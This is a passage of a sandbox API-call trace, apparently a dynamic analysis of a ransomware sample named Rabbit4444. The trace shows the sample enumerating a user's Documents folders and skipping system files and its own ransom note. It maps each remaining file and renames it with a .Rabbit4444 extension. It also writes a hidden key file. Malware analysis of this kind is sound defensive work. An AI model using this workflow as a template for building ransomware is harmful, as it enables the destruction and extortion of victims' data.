dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.727] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14103774662) returned 1 [0049.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0049.727] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0049.727] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.728] CloseHandle (hObject=0x298) returned 1 [0049.728] CloseHandle (hObject=0x278) returned 1 [0049.728] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\I4xTf-C.odp.Rabbit4444") returned 91 [0049.728] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\I4xTf-C.odp" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\i4xtf-c.odp"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\I4xTf-C.odp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\i4xtf-c.odp.rabbit4444"), dwFlags=0x1) returned 1 [0049.729] InterlockedExchangeAdd (in: Addend=0xff618, Value=30368 | out: Addend=0xff618) returned 22875968 [0049.729] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3676 [0049.729] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f99fe0, ftCreationTime.dwHighDateTime=0x1d4c7f8, ftLastAccessTime.dwLowDateTime=0xe3b46710, ftLastAccessTime.dwHighDateTime=0x1d4d229, ftLastWriteTime.dwLowDateTime=0xe3b46710, ftLastWriteTime.dwHighDateTime=0x1d4d229, nFileSizeHigh=0x0, nFileSizeLow=0xbdb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V aDNuCa.xlsx", cAlternateFileName="VADNUC~1.XLS")) returned 1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2="Rabbit4444.exe") returned 1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2=".") returned 1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2="..") returned 1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2="windows") returned -1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2="bootmgr") returned 1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2="pagefile.sys") returned 1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2="boot") returned 1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2="ids.txt") returned 1 [0049.729] lstrcmpiW (lpString1="V aDNuCa.xlsx", lpString2="NTUSER.DAT") returned 1 [0049.729] lstrcpyW (in: lpString1=0x130ebc2, lpString2="V aDNuCa.xlsx" | out: lpString1="V aDNuCa.xlsx") returned="V aDNuCa.xlsx" [0049.729] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\V aDNuCa.xlsx", dwFileAttributes=0x0) returned 1 [0049.729] lstrlenW (lpString="V aDNuCa.xlsx") returned 13 [0049.729] lstrlenW (lpString="Rabbit4444") returned 10 [0049.729] lstrcmpiW (lpString1="DNuCa.xlsx", lpString2="Rabbit4444") returned -1 [0049.729] lstrlenW (lpString=".dll") returned 4 [0049.729] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0049.729] lstrlenW (lpString=".lnk") returned 4 [0049.730] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0049.730] lstrlenW (lpString=".ini") returned 4 [0049.730] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0049.730] lstrlenW (lpString=".sys") returned 4 [0049.730] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0049.730] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\V aDNuCa.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\v adnuca.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.730] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.730] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14104056389) returned 1 [0049.730] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=48567) returned 1 [0049.730] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0049.730] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0049.730] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc0c0, lpName=0x0) returned 0x298 [0049.730] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc0c0) returned 0x70000 [0049.732] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.732] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0049.732] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.732] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.732] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.732] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.732] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.732] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0049.732] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14104301661) returned 1 [0049.732] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0049.732] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0049.732] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.733] CloseHandle (hObject=0x298) returned 1 [0049.733] CloseHandle (hObject=0x278) returned 1 [0049.734] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\V aDNuCa.xlsx.Rabbit4444") returned 93 [0049.734] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\V aDNuCa.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\v adnuca.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\V aDNuCa.xlsx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\v adnuca.xlsx.rabbit4444"), dwFlags=0x1) returned 1 [0049.734] InterlockedExchangeAdd (in: Addend=0xff618, Value=48576 | out: Addend=0xff618) returned 22906336 [0049.734] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3677 [0049.734] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f99fe0, ftCreationTime.dwHighDateTime=0x1d4c7f8, ftLastAccessTime.dwLowDateTime=0xe3b46710, ftLastAccessTime.dwHighDateTime=0x1d4d229, ftLastWriteTime.dwLowDateTime=0xe3b46710, ftLastWriteTime.dwHighDateTime=0x1d4d229, nFileSizeHigh=0x0, nFileSizeLow=0xbdb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V aDNuCa.xlsx", cAlternateFileName="VADNUC~1.XLS")) returned 0 [0049.734] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0049.734] lstrcpyW (in: lpString1=0x130ebc2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.734] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\EYPPTs4FJO\\MMADP1Sx8P2k7\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\eyppts4fjo\\mmadp1sx8p2k7\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.735] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.735] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.736] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.736] CloseHandle (hObject=0x278) returned 1 [0049.736] CloseHandle (hObject=0x27c) returned 1 [0049.736] GetCurrentThreadId () returned 0xd98 [0049.736] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0049.736] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK" [0049.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0049.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0049.736] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK" [0049.736] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\" [0049.736] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\.BFC0E91B00AE8A0620D3" [0049.736] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.737] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.740] FlushFileBuffers (hFile=0x27c) returned 1 [0049.741] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.741] CloseHandle (hObject=0x27c) returned 1 [0049.742] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK") returned 63 [0049.742] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.742] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f4cfd0, ftCreationTime.dwHighDateTime=0x1d4ccfa, ftLastAccessTime.dwLowDateTime=0x13e637e0, ftLastAccessTime.dwHighDateTime=0x1d4ca0c, ftLastWriteTime.dwLowDateTime=0xe6f8ab4c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0049.742] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.742] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.742] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.742] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.742] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f4cfd0, ftCreationTime.dwHighDateTime=0x1d4ccfa, ftLastAccessTime.dwLowDateTime=0x13e637e0, ftLastAccessTime.dwHighDateTime=0x1d4ca0c, ftLastWriteTime.dwLowDateTime=0xe6f8ab4c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.742] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.742] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.742] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.742] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.742] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.742] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6f8ab4c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6f8ab4c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6f8ab4c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.742] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.742] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.742] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83aa9a0, ftCreationTime.dwHighDateTime=0x1d4c6f2, ftLastAccessTime.dwLowDateTime=0xd8a685e0, ftLastAccessTime.dwHighDateTime=0x1d4c8fd, ftLastWriteTime.dwLowDateTime=0xd8a685e0, ftLastWriteTime.dwHighDateTime=0x1d4c8fd, nFileSizeHigh=0x0, nFileSizeLow=0xdbca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1pNb.docx", cAlternateFileName="1PNB~1.DOC")) returned 1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2="Rabbit4444.exe") returned -1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2=".") returned 1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2="..") returned 1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2="windows") returned -1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2="bootmgr") returned -1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2="pagefile.sys") returned -1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2="boot") returned -1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2="ids.txt") returned -1 [0049.743] lstrcmpiW (lpString1="1pNb.docx", lpString2="NTUSER.DAT") returned -1 [0049.743] lstrcpyW (in: lpString1=0x130ebb8, lpString2="1pNb.docx" | out: lpString1="1pNb.docx") returned="1pNb.docx" [0049.743] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\1pNb.docx", dwFileAttributes=0x0) returned 1 [0049.743] lstrlenW (lpString="1pNb.docx") returned 9 [0049.743] lstrlenW (lpString="Rabbit4444") returned 10 [0049.743] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0049.743] lstrlenW (lpString=".dll") returned 4 [0049.743] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0049.743] lstrlenW (lpString=".lnk") returned 4 [0049.743] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0049.743] lstrlenW (lpString=".ini") returned 4 [0049.743] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0049.743] lstrlenW (lpString=".sys") returned 4 [0049.743] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0049.743] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\1pNb.docx" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\1pnb.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.743] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.744] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14105429426) returned 1 [0049.744] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=56266) returned 1 [0049.744] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0049.744] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0049.744] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xded0, lpName=0x0) returned 0x298 [0049.744] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xded0) returned 0x70000 [0049.745] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.745] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.745] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.745] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.746] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14105649471) returned 1 [0049.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0049.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0049.746] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.746] CloseHandle (hObject=0x298) returned 1 [0049.746] CloseHandle (hObject=0x278) returned 1 [0049.747] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\1pNb.docx.Rabbit4444") returned 84 [0049.747] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\1pNb.docx" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\1pnb.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\1pNb.docx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\1pnb.docx.rabbit4444"), dwFlags=0x1) returned 1 [0049.747] InterlockedExchangeAdd (in: Addend=0xff618, Value=56272 | out: Addend=0xff618) returned 22954912 [0049.747] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3679 [0049.748] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3330b60, ftCreationTime.dwHighDateTime=0x1d4c89b, ftLastAccessTime.dwLowDateTime=0x455062e0, ftLastAccessTime.dwHighDateTime=0x1d4d4cc, ftLastWriteTime.dwLowDateTime=0x455062e0, ftLastWriteTime.dwHighDateTime=0x1d4d4cc, nFileSizeHigh=0x0, nFileSizeLow=0x6b3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gE99JrIwutT0tFxNz.odt", cAlternateFileName="GE99JR~1.ODT")) returned 1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2="Rabbit4444.exe") returned -1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2=".") returned 1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2="..") returned 1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2="windows") returned -1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2="bootmgr") returned 1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2="pagefile.sys") returned -1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2="boot") returned 1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2="ids.txt") returned -1 [0049.748] lstrcmpiW (lpString1="gE99JrIwutT0tFxNz.odt", lpString2="NTUSER.DAT") returned -1 [0049.748] lstrcpyW (in: lpString1=0x130ebb8, lpString2="gE99JrIwutT0tFxNz.odt" | out: lpString1="gE99JrIwutT0tFxNz.odt") returned="gE99JrIwutT0tFxNz.odt" [0049.748] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\gE99JrIwutT0tFxNz.odt", dwFileAttributes=0x0) returned 1 [0049.748] lstrlenW (lpString="gE99JrIwutT0tFxNz.odt") returned 21 [0049.748] lstrlenW (lpString="Rabbit4444") returned 10 [0049.748] lstrcmpiW (lpString1="0tFxNz.odt", lpString2="Rabbit4444") returned -1 [0049.748] lstrlenW (lpString=".dll") returned 4 [0049.748] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0049.748] lstrlenW (lpString=".lnk") returned 4 [0049.748] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0049.748] lstrlenW (lpString=".ini") returned 4 [0049.748] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0049.748] lstrlenW (lpString=".sys") returned 4 [0049.748] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0049.748] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\u-1JZ4Ru824_HpbNp\\D8mmMQeHMrSqYz8UevK\\gE99JrIwutT0tFxNz.odt" (normalized: "c:\\users\\fd1hvy\\documents\\u-1jz4ru824_hpbnp\\d8mmmqehmrsqyz8uevk\\ge99jriwutt0tfxnz.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.749] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.749] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14105933370) returned 1 [0049.749] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=27454) returned 1 [0049.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0049.749] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0049.749] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e40, lpName=0x0) returned 0x298 [0049.749] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e40) returned 0x70000 [0049.750] RtlAllocateHeap (HeapHandle=0xe0000, 